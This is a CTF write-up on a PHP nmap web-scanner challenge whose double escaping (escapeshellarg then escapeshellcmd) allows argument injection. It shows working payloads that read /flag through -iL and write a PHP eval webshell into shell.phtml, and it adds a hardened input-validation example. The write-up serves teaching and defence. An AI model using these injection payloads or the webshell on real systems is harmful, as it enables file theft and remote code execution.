# \[朱雀组]Nmap

Let's look at the source:

index.php

```
<?
require('settings.php');


set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
?>
```

settings.php:

```
<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readable/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');

# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');

# Comment this line to disable web scans
define('WEB_SCANS', 'enable');

# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');

# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');

?>
```

Key statements:

```
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
```

After the values are substituted in, this is equivalent to:

```
$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host
```

**Method 1: read the flag directly and write it to a file**

* -iL: load the target list from a file
* -oN: save the scan output in "Normal" format

```
 ' -iL /flag -oN flag.txt '
```

Then access flag.txt.

**Method 2: one-line webshell bypassing the php filter**

```
'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '
```
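The root cause is the `escapeshellarg()` followed by `escapeshellcmd()` chain: `escapeshellarg()` wraps the value in single quotes and rewrites each inner `'` as `'\''`, and `escapeshellcmd()` then escapes that backslash to `\\`, so the shell sees the quotes closed and the injected tokens become separate nmap arguments. The following is an added example (not part of the challenge source) that contrasts the vulnerable builder with a hardened one that allow-lists the host and quotes it once; `build_command_vulnerable`, `validate_host` and `build_command_hardened` are names chosen here.

```php
<?php
// Added example, not from the original challenge code.
// Same argument string as the challenge's NMAP_ARGS and RESULTS_PATH.
const NMAP_ARGS    = '-Pn -T4 -F --host-timeout 1000ms';
const RESULTS_PATH = 'xml/';

// Vulnerable: double escaping. escapeshellcmd() turns the backslash that
// escapeshellarg() inserted into "\\", so '' \\ '' no longer quotes anything
// and option-looking input such as -iL / -oN reaches nmap as real options.
function build_command_vulnerable(string $host, string $filename): string {
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);   // BUG: undoes escapeshellarg()'s quoting
    return "nmap " . NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
}

// Hardened: accept only an IP literal or a syntactically valid hostname.
// Hostname labels may not start with "-", so option injection is rejected
// here before any shell string is built.
function validate_host(string $host): ?string {
    $host = trim($host);
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    if (filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false) {
        return $host;
    }
    return null;
}

function build_command_hardened(string $host, string $filename): ?string {
    $host = validate_host($host);
    if ($host === null) {
        return null;                 // refuse to build a command at all
    }
    // The filename is server-generated (5 hex chars); still check it.
    if (!preg_match('/^[0-9a-f]{5}$/', $filename)) {
        return null;
    }
    // Quote exactly once, with escapeshellarg() only.
    return "nmap " . NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . escapeshellarg($host);
}

// Constructed inputs: the writeup's first payload and a legitimate host.
$payload = "' -iL /flag -oN flag.txt '";
echo build_command_vulnerable($payload, 'abcde'), PHP_EOL;   // quoting broken open
var_dump(build_command_hardened($payload, 'abcde'));          // rejected: NULL
echo build_command_hardened('scanme.nmap.org', 'abcde'), PHP_EOL;
```

Run it with `php` and compare the two command strings: in the vulnerable one the `-iL` and `-oN` tokens sit outside any quotes, in the hardened one the payload never produces a command.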

